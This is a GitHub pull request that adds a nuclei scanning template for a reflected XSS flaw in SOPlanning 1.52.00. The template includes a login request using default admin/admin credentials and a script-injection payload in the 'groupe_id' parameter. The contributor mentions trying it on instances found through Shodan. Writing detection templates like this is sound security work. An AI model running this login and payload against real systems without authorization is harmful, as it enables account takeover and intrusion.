Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

add so plannig xss #9700

Merged
merged 6 commits into from May 8, 2024
Merged

add so plannig xss #9700

merged 6 commits into from May 8, 2024

Conversation

Kazgangap
Copy link
Contributor

Template / PR Information

add soplannig 1.52.00 xss vuln

https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html

SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@DhiyaneshGeek
Copy link
Member

Hi @Kazgangap the matcher looks weak , is it possible to update the matcher

Thanks

@DhiyaneshGeek DhiyaneshGeek self-assigned this May 4, 2024
@Kazgangap
Copy link
Contributor Author

Hi @Kazgangap the matcher looks weak , is it possible to update the matcher

Thanks

hi @DhiyaneshGeek
I tested it on certain sites with Shodan. I think I overlooked auth is a vulnerability. So I would be glad if you also examine it, we can close the PR accordingly.

@DhiyaneshGeek
Copy link
Member

Hi @Kazgangap Yeah looks like authentication is involved, if you can update the template with Login Request and update additional matcher. it will be great

Thanks

@Kazgangap
Copy link
Contributor Author

Kazgangap commented May 7, 2024
edited

Hello again @DhiyaneshGeek
As you said, I added a login section and set admin admin by default. Then PoC is applied. I have seen such accounts on Shodan. I tested it on the demo site and it works. You can test it yourself. Link: https://demo.soplanning.org
Also, the person who found this vulnerability has applied for CVE and you can change the name if you want. I guess the CVE number has not been approved yet. CVE-2024-33724 PoC link: https://github.com/fuzzlove/soplanning-1.52-exploits

id: soplanning-xss

info:
  name: SOPlanning 1.52.00 Cross Site Scripting
  author: Kazgangap
  severity: high
  description: |
    SOPlanning v1.52.00 is vulnerable to reflected cross-site scripting (XSS) via the 'groupe_id' parameter.A remote unauthenticated attacker can inject JavaScript code leading to session hijacking or account takeover.
  reference:
    - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
  metadata:
    vendor: soplanning
    product: soplanning
    shodan-query: html:"soplanning"
  tags: packetstorm,xss,soplanning
  
http:
  - raw:
      - |-
        POST /process/login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate, br
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 26
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1
        Te: trailers
        Connection: close

        login={{username}}&password={{password}}
        
      - |+
        GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate, br
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Te: trailers
        Connection: close

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    redirects: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(document.domain)</script>"
        part: body
      - type: status
        status:
          - 200

Screenshot from 2024-05-07 14-18-15

@DhiyaneshGeek
Copy link
Member

Hi @Kazgangap

Thank you so much for sharing the updated template

Can you raise a New PR for Default Login for this SOPlanning , that will be a great addition

😄

@DhiyaneshGeek DhiyaneshGeek added Status: In Progress This issue is being worked on, and has someone assigned. and removed waiting for more info labels May 7, 2024
@DhiyaneshGeek DhiyaneshGeek added Done Ready to merge and removed Status: In Progress This issue is being worked on, and has someone assigned. labels May 7, 2024
@pussycat0x pussycat0x merged commit 28ae879 into projectdiscovery:main May 8, 2024
2 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@pussycat0x pussycat0x pussycat0x approved these changes

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@Kazgangap @DhiyaneshGeek @pussycat0x @ritikchaddha